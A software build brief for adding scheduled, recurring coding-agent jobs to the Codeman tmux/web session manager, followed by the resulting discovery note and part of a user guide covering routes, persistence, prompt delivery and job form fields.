The target user wants Codeman-like tmux/web/session management, but with first-class scheduled jobs for Claude, Codex, OpenCode, Terminal, or any other configurable coding-agent harness.
|
||||
|
||||
---
|
||||
|
||||
## 1. Non-Negotiable Goal
|
||||
|
||||
Add scheduling to Codeman so a user can define a scheduled coding-agent job that:
|
||||
|
||||
1. Has a name.
|
||||
2. Uses an existing Codeman-supported agent/session type where possible.
|
||||
3. Has a working directory.
|
||||
4. Has a prompt or prompt file.
|
||||
5. Has a schedule.
|
||||
6. Can be enabled or disabled.
|
||||
7. Can be manually run now.
|
||||
8. When due, creates a Codeman/tmux session.
|
||||
9. Sends the configured prompt into that session.
|
||||
10. Records last run, next run, status, and run history.
|
||||
|
||||
The first working version should prioritize **scheduling correctness and reuse of Codeman's existing tmux/session system** over UI polish.
|
||||
|
||||
---
|
||||
|
||||
## 2. Core Architectural Rule
|
||||
|
||||
Do **not** rebuild Codeman's session layer.
|
||||
|
||||
Reuse existing Codeman functionality for:
|
||||
|
||||
- Creating sessions.
|
||||
- Naming sessions.
|
||||
- Launching Claude/Codex/OpenCode/Terminal sessions.
|
||||
- Sending input into sessions.
|
||||
- Displaying sessions in the web UI.
|
||||
- Killing sessions.
|
||||
- Tracking session status if already supported.
|
||||
|
||||
If an internal API/service/function already exists, reuse it.
|
||||
|
||||
If no reusable function exists, create a thin wrapper around the existing implementation rather than duplicating logic.
|
||||
|
||||
---
|
||||
|
||||
## 3. Product Boundary
|
||||
|
||||
This build is **Codeman + Scheduler**.
|
||||
|
||||
It is not yet:
|
||||
|
||||
- A full quota engine.
|
||||
- A full lock manager.
|
||||
- A replacement for Codeman's terminal UI.
|
||||
- A new FastAPI application.
|
||||
- A multi-tenant SaaS platform.
|
||||
- A complex cron-management product.
|
||||
- A full agent autonomy framework.
|
||||
|
||||
Keep the build small and shippable.
|
||||
|
||||
---
|
||||
|
||||
## 4. Required Working Scope for v0.1
|
||||
|
||||
Implement the following minimum features.
|
||||
|
||||
### 4.1 Scheduled Jobs List
|
||||
|
||||
Create a UI page showing all scheduled jobs.
|
||||
|
||||
Each row/card should show:
|
||||
|
||||
- Job name.
|
||||
- Agent/session type.
|
||||
- Working directory.
|
||||
- Schedule type.
|
||||
- Enabled/disabled state.
|
||||
- Last run time.
|
||||
- Next run time.
|
||||
- Last run status.
|
||||
- Actions:
|
||||
- Run Now.
|
||||
- Enable/Disable.
|
||||
- Edit.
|
||||
- Delete.
|
||||
|
||||
### 4.2 Create/Edit Scheduled Job
|
||||
|
||||
Create a form for scheduled jobs with these fields:
|
||||
|
||||
- `name`
|
||||
- `agent_type`
|
||||
- Reuse Codeman's existing session/agent types where possible.
|
||||
- Include at least Terminal/custom command if supported.
|
||||
- `working_directory`
|
||||
- `launch_command` if needed by Codeman's model.
|
||||
- `prompt_mode`
|
||||
- `inline_text`
|
||||
- `prompt_file_path`
|
||||
- `prompt_text`
|
||||
- `prompt_file_path`
|
||||
- `input_mode`
|
||||
- `paste`
|
||||
- `typed`
|
||||
- `schedule_type`
|
||||
- `once`
|
||||
- `interval_minutes`
|
||||
- `daily_time`
|
||||
- `weekly_time`
|
||||
- `run_at` for one-time jobs.
|
||||
- `interval_minutes` for interval jobs.
|
||||
- `daily_time` for daily jobs.
|
||||
- `weekly_days` and `weekly_time` for weekly jobs.
|
||||
- `enabled`
|
||||
- `notes` optional.
|
||||
|
||||
Do not build a complex visual cron editor in v0.1.
|
||||
|
||||
### 4.3 Run Now
|
||||
|
||||
Every scheduled job must support a `Run Now` action.
|
||||
|
||||
Run Now should:
|
||||
|
||||
1. Create a new session through Codeman's existing session creation logic.
|
||||
2. Send the configured prompt into the session using Codeman's existing input mechanism.
|
||||
3. Create a run-history record.
|
||||
4. Update last-run fields.
|
||||
5. Redirect or link the user to the created Codeman session.
|
||||
|
||||
### 4.4 Background Scheduler Loop
|
||||
|
||||
Add a small background scheduler loop that runs inside the Codeman backend process.
|
||||
|
||||
The loop should:
|
||||
|
||||
1. Wake every 15-60 seconds.
|
||||
2. Load enabled schedules.
|
||||
3. Find schedules where `next_run_at <= now`.
|
||||
4. Create a scheduled run.
|
||||
5. Launch the session using existing Codeman session logic.
|
||||
6. Send the prompt.
|
||||
7. Record run history.
|
||||
8. Compute the next run time.
|
||||
9. Avoid duplicate launches if the loop overlaps or restarts.
|
||||
|
||||
Keep this simple and robust.
|
||||
|
||||
### 4.5 Run History
|
||||
|
||||
Every scheduled execution should create a run-history record.
|
||||
|
||||
Track:
|
||||
|
||||
- `id`
|
||||
- `scheduled_job_id`
|
||||
- `session_id` or Codeman session reference.
|
||||
- `session_name` if applicable.
|
||||
- `started_at`
|
||||
- `finished_at` optional.
|
||||
- `status`
|
||||
- `created`
|
||||
- `session_started`
|
||||
- `prompt_sent`
|
||||
- `failed`
|
||||
- `error_message` optional.
|
||||
- `trigger_type`
|
||||
- `scheduled`
|
||||
- `manual_run_now`
|
||||
- `created_session_url` or route reference if easy.
|
||||
|
||||
---
|
||||
|
||||
## 5. Scheduling Rules
|
||||
|
||||
### 5.1 Once
|
||||
|
||||
Run at a specific date/time.
|
||||
|
||||
After successful launch:
|
||||
|
||||
- Set `enabled = false`, or mark as completed.
|
||||
|
||||
### 5.2 Interval
|
||||
|
||||
Run every N minutes.
|
||||
|
||||
Example:
|
||||
|
||||
- Every 60 minutes.
|
||||
- Every 240 minutes.
|
||||
|
||||
After launch:
|
||||
|
||||
- `next_run_at = now + interval_minutes`.
|
||||
|
||||
### 5.3 Daily
|
||||
|
||||
Run every day at HH:MM.
|
||||
|
||||
After launch:
|
||||
|
||||
- Compute the next occurrence of HH:MM after now.
|
||||
|
||||
### 5.4 Weekly
|
||||
|
||||
Run on selected weekdays at HH:MM.
|
||||
|
||||
After launch:
|
||||
|
||||
- Compute the next selected weekday/time after now.
|
||||
|
||||
### 5.5 Timezone
|
||||
|
||||
Use the server's local timezone for v0.1 unless Codeman already has timezone handling.
|
||||
|
||||
Add a visible note in the UI:
|
||||
|
||||
> Times use the server's local timezone.
|
||||
|
||||
Do not overbuild timezone support in v0.1.
|
||||
|
||||
---
|
||||
|
||||
## 6. Data Storage Decision
|
||||
|
||||
First inspect Codeman's existing persistence model.
|
||||
|
||||
If Codeman already has a database or persistence layer:
|
||||
|
||||
- Reuse it.
|
||||
- Add scheduled job and scheduled run models/tables/records using the existing pattern.
|
||||
|
||||
If Codeman uses files or JSON state:
|
||||
|
||||
- Use the same style for v0.1.
|
||||
- Prefer simple persistence over introducing a heavy new dependency.
|
||||
|
||||
If there is no appropriate persistence layer:
|
||||
|
||||
- Add SQLite only if it fits the codebase cleanly.
|
||||
- Otherwise use a JSON file store for the first version.
|
||||
|
||||
Do not introduce Postgres, Redis, Celery, or a separate scheduler service.
|
||||
|
||||
---
|
||||
|
||||
## 7. Concurrency and Duplicate-Run Guard
|
||||
|
||||
Implement a basic duplicate-run guard.
|
||||
|
||||
A schedule should not launch twice for the same due time.
|
||||
|
||||
Minimum acceptable approach:
|
||||
|
||||
- Before launching, create/update a run record with a `created` or `launching` state.
|
||||
- Use a schedule-level `last_triggered_at` or `last_due_key` to avoid double launching.
|
||||
- If launch fails, record failure clearly.
|
||||
|
||||
Do not build distributed locks. Codeman is expected to be local/single-instance for v0.1.
|
||||
|
||||
---
|
||||
|
||||
## 8. Multi-Session Warning
|
||||
|
||||
When the user clicks `Run Now`, show a warning if there are already active sessions for the same agent type.
|
||||
|
||||
Minimum behavior:
|
||||
|
||||
- If active sessions exist, show a confirmation warning.
|
||||
- User can continue anyway.
|
||||
|
||||
For scheduled automatic runs:
|
||||
|
||||
- Add a setting on the scheduled job:
|
||||
- `warn_only`
|
||||
- `skip_if_same_agent_running`
|
||||
|
||||
Default:
|
||||
|
||||
- `warn_only` for manual runs.
|
||||
- `skip_if_same_agent_running = false` for automatic runs unless easy to implement.
|
||||
|
||||
Do not build a complete quota engine in v0.1.
|
||||
|
||||
---
|
||||
|
||||
## 9. Prompt Sending Rules
|
||||
|
||||
The scheduler must support sending the configured prompt into the created session.
|
||||
|
||||
Prompt source:
|
||||
|
||||
1. Inline prompt text.
|
||||
2. Prompt file path.
|
||||
|
||||
Input mode:
|
||||
|
||||
1. Paste mode.
|
||||
2. Typed mode.
|
||||
|
||||
If only one input mode is easy with Codeman's current internals, implement that first and structure the code so the other can be added later.
|
||||
|
||||
Important:
|
||||
|
||||
- Do not send prompts to a session if session creation failed.
|
||||
- Record prompt-send success/failure in run history.
|
||||
- Save enough metadata to understand what prompt was used.
|
||||
|
||||
---
|
||||
|
||||
## 10. UI Bifurcation
|
||||
|
||||
Keep UI changes cleanly separated.
|
||||
|
||||
Add scheduler UI under a clear navigation item:
|
||||
|
||||
- `Scheduled Jobs`
|
||||
|
||||
Do not clutter the existing session dashboard.
|
||||
|
||||
The existing session dashboard may show sessions created by scheduled jobs, but the scheduling controls should live in their own section.
|
||||
|
||||
Recommended pages/routes:
|
||||
|
||||
- `/schedules`
|
||||
- `/schedules/new`
|
||||
- `/schedules/:id`
|
||||
- `/schedules/:id/edit`
|
||||
- `/schedules/:id/run-now`
|
||||
- `/schedules/:id/enable`
|
||||
- `/schedules/:id/disable`
|
||||
- `/schedules/:id/delete`
|
||||
|
||||
Use Codeman's existing frontend conventions and routing style.
|
||||
|
||||
---
|
||||
|
||||
## 11. Backend Bifurcation
|
||||
|
||||
Keep scheduler code separate from existing session code.
|
||||
|
||||
Recommended logical modules, adapted to Codeman's actual structure:
|
||||
|
||||
- `scheduler/model` or equivalent.
|
||||
- `scheduler/store` or equivalent.
|
||||
- `scheduler/service` for schedule calculations and launch logic.
|
||||
- `scheduler/loop` for the background due-job checker.
|
||||
- `scheduler/routes` for API/UI endpoints.
|
||||
- `scheduler/time` for next-run calculations.
|
||||
|
||||
Do not mix scheduling logic directly into terminal rendering, xterm handling, or low-level tmux code.
|
||||
|
||||
The scheduler service should call session services; it should not own tmux directly unless Codeman has no session abstraction.
|
||||
|
||||
---
|
||||
|
||||
## 12. Required Discovery Phase Before Coding
|
||||
|
||||
Before implementing, inspect the Codeman repo and produce a short architecture note in the terminal or in a file called:
|
||||
|
||||
`docs/cron-discovery.md`
|
||||
|
||||
This note must identify:
|
||||
|
||||
1. Where session creation happens.
|
||||
2. Where agent/session types are defined.
|
||||
3. Where input is sent into a session.
|
||||
4. Where active sessions are listed.
|
||||
5. Where session kill/delete is handled.
|
||||
6. How session state is stored.
|
||||
7. Whether there is existing persistence.
|
||||
8. Where backend routes live.
|
||||
9. Where frontend pages/components live.
|
||||
10. The smallest integration points for scheduling.
|
||||
|
||||
Do not start coding until this discovery is complete.
|
||||
|
||||
---
|
||||
|
||||
## 13. Implementation Phases
|
||||
|
||||
### Phase 1: Discovery
|
||||
|
||||
Deliverable:
|
||||
|
||||
- `docs/cron-discovery.md`
|
||||
|
||||
Must answer the 10 discovery questions above.
|
||||
|
||||
### Phase 2: Data Model / Persistence
|
||||
|
||||
Deliverable:
|
||||
|
||||
- Scheduled job persistence.
|
||||
- Scheduled run history persistence.
|
||||
- Basic create/read/update/delete operations.
|
||||
|
||||
### Phase 3: Scheduler Calculation Logic
|
||||
|
||||
Deliverable:
|
||||
|
||||
- Functions to compute `next_run_at` for:
|
||||
- once
|
||||
- interval
|
||||
- daily
|
||||
- weekly
|
||||
|
||||
Add tests if the repo has an existing test setup.
|
||||
|
||||
### Phase 4: Manual Run Now
|
||||
|
||||
Deliverable:
|
||||
|
||||
- Create scheduled job.
|
||||
- Click Run Now.
|
||||
- Codeman session is created.
|
||||
- Prompt is sent.
|
||||
- Run history is recorded.
|
||||
- UI links to the session.
|
||||
|
||||
This is the most important milestone.
|
||||
|
||||
### Phase 5: Background Scheduler Loop
|
||||
|
||||
Deliverable:
|
||||
|
||||
- Enabled schedules launch automatically when due.
|
||||
- Run history is recorded.
|
||||
- `last_run_at` and `next_run_at` update.
|
||||
- Duplicate launch guard exists.
|
||||
|
||||
### Phase 6: UI Polish Only After Functionality
|
||||
|
||||
Deliverable:
|
||||
|
||||
- Scheduled jobs list is readable.
|
||||
- Create/edit form is usable.
|
||||
- Status labels are clear.
|
||||
- Errors are visible.
|
||||
|
||||
Do not polish before Phase 4 works.
|
||||
|
||||
---
|
||||
|
||||
## 14. Acceptance Criteria
|
||||
|
||||
The build is acceptable when all these pass.
|
||||
|
||||
### Manual Run
|
||||
|
||||
1. Create a schedule/job with inline prompt.
|
||||
2. Click Run Now.
|
||||
3. A new Codeman/tmux session starts.
|
||||
4. Prompt is sent into that session.
|
||||
5. The created session is visible in Codeman's normal session UI.
|
||||
6. Run history shows success or failure.
|
||||
|
||||
### One-Time Schedule
|
||||
|
||||
1. Create a one-time schedule 2 minutes in the future.
|
||||
2. Wait for it to become due.
|
||||
3. Scheduler launches a session.
|
||||
4. Prompt is sent.
|
||||
5. Schedule does not repeatedly launch forever.
|
||||
|
||||
### Interval Schedule
|
||||
|
||||
1. Create interval schedule every 2 minutes.
|
||||
2. It launches once when due.
|
||||
3. It computes the next due time.
|
||||
4. It does not launch duplicates for the same due time.
|
||||
|
||||
### Daily Schedule
|
||||
|
||||
1. Create daily schedule at a time a few minutes ahead.
|
||||
2. It launches when due.
|
||||
3. Next run becomes tomorrow at the same time.
|
||||
|
||||
### Disable Schedule
|
||||
|
||||
1. Disable a schedule.
|
||||
2. It does not launch even when due.
|
||||
|
||||
### Error Handling
|
||||
|
||||
1. Invalid working directory produces visible error.
|
||||
2. Invalid prompt file produces visible error.
|
||||
3. Failed session launch creates failed run-history entry.
|
||||
|
||||
---
|
||||
|
||||
## 15. Explicitly Out of Scope for v0.1
|
||||
|
||||
Do not implement these unless all required scope is already working:
|
||||
|
||||
- Full quota engine.
|
||||
- Advanced lock manager.
|
||||
- Post-run git inspection reports.
|
||||
- Complex recurring calendar UI.
|
||||
- User accounts / RBAC.
|
||||
- External distributed workers.
|
||||
- Redis.
|
||||
- Postgres.
|
||||
- Celery.
|
||||
- Kubernetes.
|
||||
- A separate Python service.
|
||||
- Full visual cron editor.
|
||||
- AI-generated follow-up prompts.
|
||||
- Automatic continuation after idle.
|
||||
- Any attempt to bypass agent quotas or platform limits.
|
||||
|
||||
---
|
||||
|
||||
## 16. Quality Rules
|
||||
|
||||
Follow these rules while coding:
|
||||
|
||||
1. Reuse existing Codeman services and conventions.
|
||||
2. Keep scheduler code isolated.
|
||||
3. Prefer boring, readable code over clever abstractions.
|
||||
4. Add error messages that a human can understand.
|
||||
5. Do not break existing Codeman sessions.
|
||||
6. Do not rename existing core concepts unnecessarily.
|
||||
7. Do not introduce large dependencies without strong reason.
|
||||
8. Keep v0.1 local-first and single-instance.
|
||||
9. Commit in logical chunks if git is available.
|
||||
10. After coding, provide a final implementation summary.
|
||||
|
||||
---
|
||||
|
||||
## 17. Final Response Required from Claude Code
|
||||
|
||||
At the end, report:
|
||||
|
||||
1. Files changed.
|
||||
2. New routes/pages added.
|
||||
3. New data structures added.
|
||||
4. How the scheduler loop works.
|
||||
5. How to run the app.
|
||||
6. How to test manual Run Now.
|
||||
7. How to test scheduled execution.
|
||||
8. Known limitations.
|
||||
9. Suggested v0.2 improvements.
|
||||
|
||||
---
|
||||
|
||||
## 18. v0.2 Ideas, Not for Current Build
|
||||
|
||||
Keep these in mind but do not build unless v0.1 is complete:
|
||||
|
||||
- Quota-aware scheduling.
|
||||
- Manual takeover locks.
|
||||
- Post-idle inspection.
|
||||
- Git diff reports.
|
||||
- Schedule groups.
|
||||
- Prompt templates.
|
||||
- Agent-specific concurrency rules.
|
||||
- Better timezone support.
|
||||
- Audit events.
|
||||
- More advanced cron expressions.
|
||||
|
||||
---
|
||||
|
||||
## 19. Final Reminder
|
||||
|
||||
The goal is to add **scheduling** to Codeman quickly and cleanly.
|
||||
|
||||
Do not drift into building a new platform.
|
||||
|
||||
The highest-priority path is:
|
||||
|
||||
1. Discover existing Codeman integration points.
|
||||
2. Add scheduled job persistence.
|
||||
3. Add Run Now.
|
||||
4. Add background due-job loop.
|
||||
5. Add minimal UI.
|
||||
6. Verify that scheduled jobs create real Codeman/tmux sessions and send prompts.
|
||||
|
||||
@@ -0,0 +1,142 @@
|
||||
# CRON_DISCOVERY.md
|
||||
|
||||
Phase 1 deliverable for the "Add Scheduling to Codeman" build brief.
|
||||
This documents the existing Codeman architecture and the smallest integration
|
||||
points for a cron. **No session/tmux logic will be rebuilt** —
|
||||
the new code is purely a trigger + persistence + history layer on top of the
|
||||
existing primitives.
|
||||
|
||||
Stack: `aicodeman` v1.2.1 — Fastify 5 backend, `node-pty` + tmux sessions,
|
||||
vanilla-JS SPA frontend served as static assets, JSON file state store, zod
|
||||
validation, ports-based dependency injection.
|
||||
|
||||
---
|
||||
|
||||
## 0. Critical finding: an existing `ScheduledRun` is NOT a cron
|
||||
|
||||
Codeman already has a `ScheduledRun` concept (`/api/scheduled`,
|
||||
`src/web/ports/infra-port.ts:14-26`, `src/web/server.ts:1480-1605`). It is a
|
||||
**run-now, duration-bounded autonomous loop**: given `{prompt, workingDir,
|
||||
durationMinutes}` it immediately spawns/kills throwaway sessions in a loop until
|
||||
the duration elapses. It has **no** time-based triggering, recurrence
|
||||
(once/interval/daily/weekly), enable/disable, next-run calculation, run history,
|
||||
or persistence across restarts.
|
||||
|
||||
Therefore the brief's core (the calendar/cron trigger layer) does **not** exist
|
||||
and must be built. The execution primitives it sits on top of **do** exist and
|
||||
will be reused. To honor brief §16 ("do not rename existing core concepts"), the
|
||||
new feature is named **`CronJob`** (with **`CronJobRun`** history
|
||||
records), kept distinct from the existing `ScheduledRun`.
|
||||
|
||||
---
|
||||
|
||||
## 1. Where session creation happens
|
||||
|
||||
- Canonical create flow: `POST /api/sessions`,
|
||||
`src/web/routes/session-routes.ts:262-438`.
|
||||
- `new Session({ workingDir, mode, ... })` (`src/session.ts:421-570`)
|
||||
- `ctx.addSession(session)` → `ctx.setupSessionListeners(session)` →
|
||||
`ctx.persistSessionState(session)` (all via `SessionPort`).
|
||||
- `SessionPort` interface: `src/web/ports/session-port.ts:8-16`.
|
||||
- **Integration point:** the cron service will mirror this exact sequence
|
||||
(create → addSession → setupSessionListeners → start) via `SessionPort`,
|
||||
not reimplement it.
|
||||
|
||||
## 2. Where agent/session types are defined
|
||||
|
||||
- `type SessionMode = 'claude' | 'shell' | 'opencode' | 'codex' | 'gemini' | 'antigravity'`
|
||||
(`src/types/session.ts:43-44`). `shell` covers the brief's "Terminal/custom".
|
||||
- CLI availability resolvers in `src/utils/{claude,codex,gemini,antigravity,opencode}-cli-resolver.ts`.
|
||||
- **Integration point:** the job's `agentType` reuses `SessionMode` verbatim.
|
||||
|
||||
## 3. Where input is sent into a session
|
||||
|
||||
- Raw / paste: `session.write(data)` (`src/session.ts:2243-2247`) — direct PTY write.
|
||||
- Typed (recommended): `session.writeViaMux(data)` (`src/session.ts:2301-2311`)
|
||||
— tmux `send-keys`, falls back to PTY. Submit requires trailing `\r`.
|
||||
- **Integration point:** prompt delivery uses `writeViaMux` (typed) by default,
|
||||
`write` (paste) as the alternate `input_mode`.
|
||||
|
||||
## 4. Where active sessions are listed
|
||||
|
||||
- `ctx.sessions: ReadonlyMap<string, Session>` (`SessionPort`).
|
||||
- Filters: `Array.from(ctx.sessions.values()).filter(s => s.mode === X)` and
|
||||
`.isBusy()` / `.isIdle()` (`src/session-manager.ts:220-247`).
|
||||
- **Integration point:** the §8 multi-session warning queries this map.
|
||||
|
||||
## 5. Where session kill/delete is handled
|
||||
|
||||
- `ctx.cleanupSession(sessionId, killMux?, reason?)`
|
||||
(`SessionPort`; impl `src/web/server.ts:997-1152`). Underlying
|
||||
`session.stop(killMux)` at `src/session.ts:2498-2585`.
|
||||
- The cron does **not** kill sessions it launches (the brief wants them
|
||||
visible in the normal session UI); cleanup stays user-driven.
|
||||
_Superseded post-review:_ recurring jobs now default to
|
||||
`autoClosePreviousSession: true` — the previous run's still-open session is
|
||||
closed via `cleanupSession` when the next run fires (see
|
||||
`docs/cron-guide.md` §8); opt out per job for fully user-driven cleanup.
|
||||
|
||||
## 6. How session state is stored / 7. Existing persistence
|
||||
|
||||
- JSON file store: `~/.codeman/state.json` (+ `state-inner.json` for Ralph).
|
||||
`StateStore` class `src/state-store.ts:71`; `AppState` interface
|
||||
`src/types/app-state.ts:99-114`.
|
||||
- Pattern: declare a field on `AppState`, add typed get/set methods on
|
||||
`StateStore` that mutate in-memory state and call the debounced `save()`
|
||||
(500ms debounce, atomic temp-file+rename, `.bak` backup, circuit breaker).
|
||||
- **Integration point:** add `cronJobs?: Record<string, CronJob>` and
|
||||
`cronJobRuns?: Record<string, CronJobRun>` to `AppState`, with
|
||||
matching `StateStore` accessors. No new DB (brief §6 forbids Postgres/Redis).
|
||||
|
||||
## 8. Where backend routes live
|
||||
|
||||
- Route modules: `src/web/routes/*.ts`; barrel `src/web/routes/index.ts`;
|
||||
registered in `WebServer.setupRoutes()` `src/web/server.ts:858-876` with a
|
||||
single `ctx` object from `createRouteContext()` (`src/web/server.ts:553-613`)
|
||||
that satisfies all port interfaces.
|
||||
- Validation: zod schemas in `src/web/schemas.ts`, applied via
|
||||
`parseBody(Schema, req.body)` (`src/web/route-helpers.ts:101-111`).
|
||||
- Errors: `createErrorResponse(ApiErrorCode.X, msg)` / `ApiResponse`
|
||||
(`src/types/api.ts`), auto-mapped to HTTP status by a `preSerialization` hook
|
||||
(`src/web/server.ts:644-659`).
|
||||
- SSE: `ctx.broadcast(SseEvent.X, data)` (`EventPort`,
|
||||
`src/web/sse-events.ts`); frontend mirror in `src/web/public/constants.js`.
|
||||
- **Integration point:** new `cron-routes.ts` registered alongside the
|
||||
others; new zod schema; new `SseEvent` constants for job list/run changes.
|
||||
|
||||
## 9. Where frontend pages/components live
|
||||
|
||||
- Vanilla-JS SPA: single `src/web/public/index.html` + feature mixin files
|
||||
(`Object.assign(CodemanApp.prototype, {...})`). API via `api-client.js`
|
||||
(`_apiJson/_apiPost/_apiDelete`). Build = esbuild minify + content-hash, no
|
||||
bundler (`scripts/build.mjs`).
|
||||
- UI is panels/modals toggled by JS classes; forms use `.form-row` / `.modal`
|
||||
conventions (`styles.css`). SSE handler map in `app.js`.
|
||||
- **Integration point:** add a new `cron-ui.js` mixin + a panel/modal in
|
||||
`index.html` + nav entry, following the orchestrator/respawn panel pattern.
|
||||
|
||||
## 10. Background-loop pattern (for the due-checker)
|
||||
|
||||
- Established pattern: `this.cleanup.setInterval(fn, intervalMs, {description})`
|
||||
in `WebServer.start()` (`src/web/server.ts:~1942-1966`), auto-disposed in
|
||||
`WebServer.stop()` via `this.cleanup.dispose()` (`src/web/server.ts:2336`).
|
||||
RalphLoop (`src/ralph-loop.ts:268-286`) shows the self-rescheduling guard idiom.
|
||||
- **Integration point:** register a 30s cron tick via `cleanup.setInterval`;
|
||||
no manual shutdown wiring needed.
|
||||
|
||||
---
|
||||
|
||||
## Smallest integration points (summary)
|
||||
|
||||
| New piece | Reuses | Location |
|
||||
| --- | --- | --- |
|
||||
| `CronJob` / `CronJobRun` types | — (new) | `src/types/cron.ts` |
|
||||
| Persistence | `StateStore` / `AppState` | `src/types/app-state.ts`, `src/state-store.ts` |
|
||||
| Next-run time math | — (new, pure, unit-tested) | `src/cron/cron-time.ts` |
|
||||
| Launch + send prompt | `SessionPort` (`addSession`/listeners/`writeViaMux`) | `src/cron/cron-service.ts` |
|
||||
| Background due loop | `cleanup.setInterval` pattern | `src/cron/cron-loop.ts` |
|
||||
| Routes + schema | route/ports/zod/SSE patterns | `src/web/routes/cron-routes.ts`, `src/web/schemas.ts`, `src/web/sse-events.ts` |
|
||||
| UI | panel/modal/mixin conventions | `src/web/public/cron-ui.js`, `index.html` |
|
||||
|
||||
Nothing in the session, tmux, persistence, routing, or SSE subsystems is
|
||||
rewritten — the cron is additive and calls existing services.
|
||||
@@ -0,0 +1,426 @@
|
||||
# Cron Jobs — User & Operator Guide
|
||||
|
||||
Codeman's **Cron** feature lets you save named, recurring jobs that automatically
|
||||
spin up a Claude (or shell / OpenCode / Codex / Antigravity / Gemini) session on a schedule and
|
||||
feed it a prompt. Think "cron for agent sessions": _"every weekday at 3am, open a
|
||||
Claude session in `~/proj` and tell it to update dependencies and open a PR."_
|
||||
|
||||
- **UI**: the **⏰ Cron** button in the header → the Cron Jobs modal (`#cronModal`).
|
||||
- **API**: `/api/cron/jobs*` and `/api/cron/runs`.
|
||||
- **Code**: `src/cron/cron-service.ts`, `src/cron/cron-time.ts`, `src/cron/cron-input.ts`,
|
||||
types in `src/types/cron.ts`, routes in `src/web/routes/cron-routes.ts`,
|
||||
frontend in `src/web/public/cron-ui.js`.
|
||||
|
||||
> **Not to be confused with `ScheduledRun` (`/api/scheduled`).** That older,
|
||||
> deliberately-separate concept is a _run-now, duration-bounded autonomous loop_
|
||||
> (`{prompt, workingDir, durationMinutes}` → spawn/kill throwaway sessions until
|
||||
> the duration elapses). It has no recurrence, no saved jobs, and no next-run
|
||||
> calculation. The two systems never interact. This guide is only about **Cron
|
||||
> jobs** (`Cron*`). See `docs/cron-discovery.md` §0.
|
||||
|
||||
---
|
||||
|
||||
## 1. Quick start
|
||||
|
||||
### In the browser
|
||||
|
||||
1. Click **⏰ Cron** in the header.
|
||||
2. Click **+ New Job**.
|
||||
3. Fill in a **name**, pick an **agent type** and **working directory**, choose a
|
||||
**prompt** (inline text or a file path), pick a **schedule**, and leave
|
||||
**Enabled** on.
|
||||
4. **Save**. The job appears in the list with its computed **next run**.
|
||||
5. Use **Run Now** to fire it immediately without waiting for the schedule.
|
||||
|
||||
### With curl
|
||||
|
||||
```bash
|
||||
API=http://localhost:3000
|
||||
|
||||
# Create a daily job (03:00 server-local time)
|
||||
curl -s -X POST "$API/api/cron/jobs" \
|
||||
-H 'Content-Type: application/json' \
|
||||
-d '{
|
||||
"name": "nightly-deps",
|
||||
"agentType": "claude",
|
||||
"workingDir": "/home/me/proj",
|
||||
"promptMode": "inline_text",
|
||||
"promptText": "Update dependencies and open a PR",
|
||||
"inputMode": "typed",
|
||||
"scheduleType": "daily",
|
||||
"dailyTime": "03:00",
|
||||
"enabled": true,
|
||||
"concurrencyPolicy": "warn_only"
|
||||
}' | jq
|
||||
|
||||
# List jobs
|
||||
curl -s "$API/api/cron/jobs" | jq
|
||||
|
||||
# Run one immediately
|
||||
curl -s -X POST "$API/api/cron/jobs/<jobId>/run" | jq
|
||||
|
||||
# See a job's run history
|
||||
curl -s "$API/api/cron/jobs/<jobId>/runs" | jq
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 2. Concepts
|
||||
|
||||
| Term | Meaning |
|
||||
| -------------------------- | ------------------------------------------------------------------------------------------------ |
|
||||
| **Cron job** (`CronJob`) | A saved, named definition: what agent to launch, where, with what prompt, on what schedule. |
|
||||
| **Run** (`CronJobRun`) | One execution of a job — a history record with a status and a link to the session it created. |
|
||||
| **Schedule type** | How fire times are computed: `once`, `interval`, `daily`, or `weekly`. |
|
||||
| **Next run** (`nextRunAt`) | Server-computed epoch-ms of the next fire. `null` when the job is disabled or has no future run. |
|
||||
| **Due tick** | A background loop (every 30s) that launches any enabled job whose `nextRunAt` has passed. |
|
||||
|
||||
A job is essentially a **trigger + persistence + history layer on top of the
|
||||
existing session primitives**. When a job fires, the cron service does exactly
|
||||
what the "quick start" route does — `new Session(...)` → `addSession` →
|
||||
`setupSessionListeners` → `startInteractive()`/`startShell()` → deliver the
|
||||
prompt. It does **not** reimplement any tmux/PTY logic.
|
||||
|
||||
---
|
||||
|
||||
## 3. The job form — every field
|
||||
|
||||
These map 1:1 to `CronJobSchema` (`src/web/schemas.ts`) and the `CronJob` type
|
||||
(`src/types/cron.ts`).
|
||||
|
||||
| Field | Required | Values / limits | Notes |
|
||||
| -------------------------- | ----------- | -------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
|
||||
| `name` | ✅ | 1–200 chars | Display name; also used as the created session's name. |
|
||||
| `agentType` | ✅ | `claude` \| `shell` \| `opencode` \| `codex` \| `gemini` \| `antigravity` | Reuses Codeman's `SessionMode`. `shell` = a plain terminal. |
|
||||
| `workingDir` | ✅ | valid path (allowlist-validated) | Validated at **create/update** (must exist, be a directory, and not resolve into a blocked tree — `/etc`, `/root`, `/proc`, `/sys`, `/dev`, or `/` itself) and again **at fire time**. |
|
||||
| `launchCommand` | — | ≤ 2000 chars, single line | `shell` mode only: sent as the **first input line** once the shell is up, before the prompt. Ignored for other agent types. |
|
||||
| `promptMode` | ✅ | `inline_text` \| `prompt_file_path` | See §5. |
|
||||
| `promptText` | conditional | ≤ 100000 chars, **single line** | Required when `promptMode = inline_text`. Newlines are rejected (see §6). |
|
||||
| `promptFilePath` | conditional | valid path | Required when `promptMode = prompt_file_path`. Confined to `workingDir` (see §5). |
|
||||
| `inputMode` | ✅ | `paste` \| `typed` | How the prompt is delivered. See §6. |
|
||||
| `scheduleType` | ✅ | `once` \| `interval` \| `daily` \| `weekly` | See §4. |
|
||||
| `runAt` | conditional | epoch-ms (positive int) | Required for `once`. |
|
||||
| `intervalMinutes` | conditional | 1–525600 (≤ 1 year) | Required for `interval`. |
|
||||
| `dailyTime` | conditional | `HH:MM` (24h) | Required for `daily`. Server-local time. |
|
||||
| `weeklyDays` | conditional | array of 1–7 ints, each 0–6 (0 = Sunday) | Required for `weekly`. |
|
||||
| `weeklyTime` | conditional | `HH:MM` (24h) | Required for `weekly`. Server-local time. |
|
||||
| `enabled` | ✅ | boolean | Disabled jobs never auto-fire (but **Run Now** still works). |
|
||||
| `notes` | — | ≤ 2000 chars | Free-form. |
|
||||
| `concurrencyPolicy` | ✅ | `warn_only` \| `skip_if_same_agent_running` | Applies to **automatic** runs only. See §7. |
|
||||
